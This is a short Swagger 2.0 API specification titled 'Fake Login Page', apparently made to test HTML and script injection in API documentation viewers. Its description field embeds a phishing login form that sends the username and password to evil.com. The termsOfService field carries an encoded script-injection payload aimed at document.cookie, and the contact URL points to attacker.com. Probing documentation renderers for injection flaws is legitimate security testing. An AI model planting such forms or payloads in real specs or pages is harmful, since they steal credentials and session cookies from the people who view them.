swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: |
    <div class="form-container">
      <form action="http://www.evil.com" method="get" class="form-signin">
        <div class="form-group">
          <label for="username">Username</label>
          <input type="text" name="username" size="20" required>
        </div>
        <div class="form-group">
          <label for="password">Password</label>
          <input type="password" name="password" size="20" required>
        </div>
        <div class="form-group">
          <button type="submit" class="btn btn-default">Login</button>
        </div>
      </form>
    </div>
  termsOfService: |
    https://bonanzasatrangi.com/collections/unstitched/%3Cscript%20src=data:text/html,alert(document.cookie)%3E%3C/script%3E
  contact: 
    name: "API Support apy"
    url: "https://attacker.com/"
    email: "bilalabbasuk@gmail.com"
  license:
    name: "MIT"
    url: "https://opensource.org/licenses/MIT"
  externalDocs:
    description: "Find more info here"
    url: "https://example.com"
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful







  
